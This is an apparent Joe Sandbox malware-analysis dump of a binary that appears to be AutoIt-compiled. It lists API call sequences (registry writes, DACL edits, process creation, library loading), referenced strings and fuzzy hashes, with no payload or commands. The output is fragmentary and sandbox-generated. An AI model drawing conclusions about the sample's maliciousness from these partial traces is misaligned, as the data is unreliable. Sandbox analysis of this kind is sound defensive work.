                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 205c39532a19e628475b9b75d9639b5732d4a1fc3a2320f8dec30c47d8867f00
                                                      • Instruction ID: 57b8213629eb31627d985a7fc4c1ead2900da539cf321b210a6bdfc56fb04a77
                                                      • Opcode Fuzzy Hash: 205c39532a19e628475b9b75d9639b5732d4a1fc3a2320f8dec30c47d8867f00
                                                      • Instruction Fuzzy Hash: 3BB1AC71604340AFD704DF65C989F6ABBE4FF85344F00995CF999AB262C732E846CB92
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00EC02E5
                                                      • _wcslen.LIBCMT ref: 00EC031F
                                                      • _wcslen.LIBCMT ref: 00EC0389
                                                      • _wcslen.LIBCMT ref: 00EC03F1
                                                      • _wcslen.LIBCMT ref: 00EC0475
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EC04C5
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC0504
                                                        • Part of subcall function 00E4F9F2: _wcslen.LIBCMT ref: 00E4F9FD
                                                        • Part of subcall function 00E9223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E92258
                                                        • Part of subcall function 00E9223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E9228A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 1103490817-719923060
                                                      • Opcode ID: 18b0a4b3c22e667f5b3bc688e3b7fc617a7ff48ddead56847810bfa4bc817a1f
                                                      • Instruction ID: fb3b6c0be4cd267add65f52ab04c58e6aa22728adc5271539488bc0777f556ad
                                                      • Opcode Fuzzy Hash: 18b0a4b3c22e667f5b3bc688e3b7fc617a7ff48ddead56847810bfa4bc817a1f
                                                      • Instruction Fuzzy Hash: 74E19E31208301DB8B18DF28C651E6AB7E6BFC8718F14695CF996BB2A1D731ED46CB41
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E48968
                                                      • GetSystemMetrics.USER32(00000007), ref: 00E48970
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E4899B
                                                      • GetSystemMetrics.USER32(00000008), ref: 00E489A3
                                                      • GetSystemMetrics.USER32(00000004), ref: 00E489C8
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E489E5
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E489F5
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E48A28
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E48A3C
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00E48A5A
                                                      • GetStockObject.GDI32(00000011), ref: 00E48A76
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E48A81
                                                        • Part of subcall function 00E4912D: GetCursorPos.USER32(?), ref: 00E49141
                                                        • Part of subcall function 00E4912D: ScreenToClient.USER32(00000000,?), ref: 00E4915E
                                                        • Part of subcall function 00E4912D: GetAsyncKeyState.USER32(00000001), ref: 00E49183
                                                        • Part of subcall function 00E4912D: GetAsyncKeyState.USER32(00000002), ref: 00E4919D
                                                      • SetTimer.USER32(00000000,00000000,00000028,00E490FC), ref: 00E48AA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: 71d5f4e3adff798e0be742b596f905cd1a25e3c8a2de819ea1a0b5352de5cebf
                                                      • Instruction ID: 050ed91910b5b37bf6bd79d8fc1e1c8f14fa5c0ec71d0170a9e6b96c8b349e16
                                                      • Opcode Fuzzy Hash: 71d5f4e3adff798e0be742b596f905cd1a25e3c8a2de819ea1a0b5352de5cebf
                                                      • Instruction Fuzzy Hash: 27B18A31A00209AFDB14DFA8DD45FAE3BB5FB48714F10522AFA19BB290DB71E941CB51
                                                      APIs
                                                        • Part of subcall function 00E910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91114
                                                        • Part of subcall function 00E910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91120
                                                        • Part of subcall function 00E910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E9112F
                                                        • Part of subcall function 00E910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91136
                                                        • Part of subcall function 00E910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E9114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E90DF5
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E90E29
                                                      • GetLengthSid.ADVAPI32(?), ref: 00E90E40
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E90E7A
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E90E96
                                                      • GetLengthSid.ADVAPI32(?), ref: 00E90EAD
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E90EB5
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E90EBC
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E90EDD
                                                      • CopySid.ADVAPI32(00000000), ref: 00E90EE4
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E90F13
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E90F35
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E90F47
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90F6E
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90F75
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90F7E
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90F85
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90F8E
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90F95
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E90FA1
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90FA8
                                                        • Part of subcall function 00E91193: GetProcessHeap.KERNEL32(00000008,00E90BB1,?,00000000,?,00E90BB1,?), ref: 00E911A1
                                                        • Part of subcall function 00E91193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E90BB1,?), ref: 00E911A8
                                                        • Part of subcall function 00E91193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E90BB1,?), ref: 00E911B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: f33580f66be9014db90d3e3fce2d86974832829c54575487d3e3d0e298099b52
                                                      • Instruction ID: fbf41cd71e6864d022d9530df68e8c2b68e98fdc4bce43945d9bc8489015c9d0
                                                      • Opcode Fuzzy Hash: f33580f66be9014db90d3e3fce2d86974832829c54575487d3e3d0e298099b52
                                                      • Instruction Fuzzy Hash: 05715C72A0020AAFDF20DFA6DC45FAEBBB8FF04304F545125F919B6191D7319A4ACB60
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC4BD
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00ECCC08,00000000,?,00000000,?,?), ref: 00EBC544
                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00EBC5A4
                                                      • _wcslen.LIBCMT ref: 00EBC5F4
                                                      • _wcslen.LIBCMT ref: 00EBC66F
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00EBC6B2
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00EBC7C1
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00EBC84D
                                                      • RegCloseKey.ADVAPI32(?), ref: 00EBC881
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EBC88E
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00EBC960
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 9721498-966354055
                                                      • Opcode ID: 46f8aa209674a42d2f5c17d858a698b8a4f7b036944a49d374e5b213e65ae328
                                                      • Instruction ID: 6cd584e0fa9cc07b41ee2b16ef0f236fa7411fbdb2d2e0909057fd8e74c3474f
                                                      • Opcode Fuzzy Hash: 46f8aa209674a42d2f5c17d858a698b8a4f7b036944a49d374e5b213e65ae328
                                                      • Instruction Fuzzy Hash: 2E127D756082019FCB14DF14C885E6ABBE5EF88714F14985DF88AAB3A2DB31FD41CB81
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00EC09C6
                                                      • _wcslen.LIBCMT ref: 00EC0A01
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC0A54
                                                      • _wcslen.LIBCMT ref: 00EC0A8A
                                                      • _wcslen.LIBCMT ref: 00EC0B06
                                                      • _wcslen.LIBCMT ref: 00EC0B81
                                                        • Part of subcall function 00E4F9F2: _wcslen.LIBCMT ref: 00E4F9FD
                                                        • Part of subcall function 00E92BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E92BFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 1103490817-4258414348
                                                      • Opcode ID: 857caca77c7fe60a91b287b8932d44561f93f92de21bab1f5e97a5533dc586a3
                                                      • Instruction ID: 70a128a318e7efc9bf082ee447164d0339537356ffdde19c441f950543ede1e2
                                                      • Opcode Fuzzy Hash: 857caca77c7fe60a91b287b8932d44561f93f92de21bab1f5e97a5533dc586a3
                                                      • Instruction Fuzzy Hash: 26E16B35208301DFCB14DF24C551A6AB7E2BF98718F14A95CF8967B262D732ED46CB81
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 1256254125-909552448
                                                      • Opcode ID: 5fd64020fc03b0826ac31cf9d8e5d2f0ca6b040ff73377c16e8cefbb125ced96
                                                      • Instruction ID: 12f90850be6c1adcbf1d2305f66dc7fc9ab42d9caadfc4955f712bf2794f28a1
                                                      • Opcode Fuzzy Hash: 5fd64020fc03b0826ac31cf9d8e5d2f0ca6b040ff73377c16e8cefbb125ced96
                                                      • Instruction Fuzzy Hash: 1071E73261812A8BCB10DE7CCD525FF7791ABA0758F352529FC96B7284E631CD85C7A0
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00EC835A
                                                      • _wcslen.LIBCMT ref: 00EC836E
                                                      • _wcslen.LIBCMT ref: 00EC8391
                                                      • _wcslen.LIBCMT ref: 00EC83B4
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EC83F2
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EC5BF2), ref: 00EC844E
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EC8487
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EC84CA
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EC8501
                                                      • FreeLibrary.KERNEL32(?), ref: 00EC850D
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EC851D
                                                      • DestroyIcon.USER32(?,?,?,?,?,00EC5BF2), ref: 00EC852C
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EC8549
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EC8555
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 799131459-1154884017
                                                      • Opcode ID: 44cc33ec8f6041beb6d30765661810f29551d03cbe06c29e41ffd0dba3bb9e1c
                                                      • Instruction ID: 4539bc7ac40e49e5d83d909e2322a819f141f902e6b1fe1fc8f814b3b0868705
                                                      • Opcode Fuzzy Hash: 44cc33ec8f6041beb6d30765661810f29551d03cbe06c29e41ffd0dba3bb9e1c
                                                      • Instruction Fuzzy Hash: 20611171500219BEEB18DF64CE41FFE77A8BB04711F10651AF815F60D1DBB2AA96CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 0-1645009161
                                                      • Opcode ID: 2a3d500d08ed928b35dc68e5892a93020a3a449d956b17d3dcd223cb868eb332
                                                      • Instruction ID: 0e73392de3e08a7fb13f8d3d090ba6d6eab4a31a2a82c3b9064dd7d62c8c0a3d
                                                      • Opcode Fuzzy Hash: 2a3d500d08ed928b35dc68e5892a93020a3a449d956b17d3dcd223cb868eb332
                                                      • Instruction Fuzzy Hash: 528105B1A04605BBDB20AF60DD47FAE7BF8AF14301F046425FD48BA292EBB1D915C791
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 00E95A2E
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E95A40
                                                      • SetWindowTextW.USER32(?,?), ref: 00E95A57
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00E95A6C
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00E95A72
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E95A82
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00E95A88
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E95AA9
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E95AC3
                                                      • GetWindowRect.USER32(?,?), ref: 00E95ACC
                                                      • _wcslen.LIBCMT ref: 00E95B33
                                                      • SetWindowTextW.USER32(?,?), ref: 00E95B6F
                                                      • GetDesktopWindow.USER32 ref: 00E95B75
                                                      • GetWindowRect.USER32(00000000), ref: 00E95B7C
                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E95BD3
                                                      • GetClientRect.USER32(?,?), ref: 00E95BE0
                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E95C05
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E95C2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                      • String ID:
                                                      • API String ID: 895679908-0
                                                      • Opcode ID: 6bf89664de7711720181112e02ea5f309b340f20b6205603324263280c91f9ff
                                                      • Instruction ID: 39215ee6d4f758e7f02cdde90bedcf3452d0d47cbea915b1f1cddb8eb016a7b3
                                                      • Opcode Fuzzy Hash: 6bf89664de7711720181112e02ea5f309b340f20b6205603324263280c91f9ff
                                                      • Instruction Fuzzy Hash: C7717C32900B09AFDB21DFA9CE85EAEBBF5FF48704F105528E586B25A0D771E945CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                                      • API String ID: 176396367-1901692981
                                                      • Opcode ID: 7130fb47551bb32e1180c195bb41c98b7df38b0240cb24c0be0688515ec7fdcc
                                                      • Instruction ID: 92bdf52335005916f4dc3de45ad7711f490382b04c9a0fe371ab81016dd04f5f
                                                      • Opcode Fuzzy Hash: 7130fb47551bb32e1180c195bb41c98b7df38b0240cb24c0be0688515ec7fdcc
                                                      • Instruction Fuzzy Hash: 31E1E532A00616ABCF18DFB8C4416FDFBB0BF54714F55A129E966B7250DB30AE85C790
                                                      APIs
                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00E500C6
                                                        • Part of subcall function 00E500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00F0070C,00000FA0,07B10558,?,?,?,?,00E723B3,000000FF), ref: 00E5011C
                                                        • Part of subcall function 00E500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E723B3,000000FF), ref: 00E50127
                                                        • Part of subcall function 00E500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E723B3,000000FF), ref: 00E50138
                                                        • Part of subcall function 00E500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E5014E
                                                        • Part of subcall function 00E500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E5015C
                                                        • Part of subcall function 00E500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E5016A
                                                        • Part of subcall function 00E500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E50195
                                                        • Part of subcall function 00E500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E501A0
                                                      • ___scrt_fastfail.LIBCMT ref: 00E500E7
                                                        • Part of subcall function 00E500A3: __onexit.LIBCMT ref: 00E500A9
                                                      Strings
                                                      • SleepConditionVariableCS, xrefs: 00E50154
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E50122
                                                      • InitializeConditionVariable, xrefs: 00E50148
                                                      • WakeAllConditionVariable, xrefs: 00E50162
                                                      • kernel32.dll, xrefs: 00E50133
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      APIs
                                                      • CharLowerBuffW.USER32(00000000,00000000,00ECCC08), ref: 00EA4527
                                                      • _wcslen.LIBCMT ref: 00EA453B
                                                      • _wcslen.LIBCMT ref: 00EA4599
                                                      • _wcslen.LIBCMT ref: 00EA45F4
                                                      • _wcslen.LIBCMT ref: 00EA463F
                                                      • _wcslen.LIBCMT ref: 00EA46A7
                                                        • Part of subcall function 00E4F9F2: _wcslen.LIBCMT ref: 00E4F9FD
                                                      • GetDriveTypeW.KERNEL32(?,00EF6BF0,00000061), ref: 00EA4743
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00EBB198
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBB1B0
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBB1D4
                                                      • _wcslen.LIBCMT ref: 00EBB200
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBB214
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBB236
                                                      • _wcslen.LIBCMT ref: 00EBB332
                                                        • Part of subcall function 00EA05A7: GetStdHandle.KERNEL32(000000F6), ref: 00EA05C6
                                                      • _wcslen.LIBCMT ref: 00EBB34B
                                                      • _wcslen.LIBCMT ref: 00EBB366
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EBB3B6
                                                      • GetLastError.KERNEL32(00000000), ref: 00EBB407
                                                      • CloseHandle.KERNEL32(?), ref: 00EBB439
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBB44A
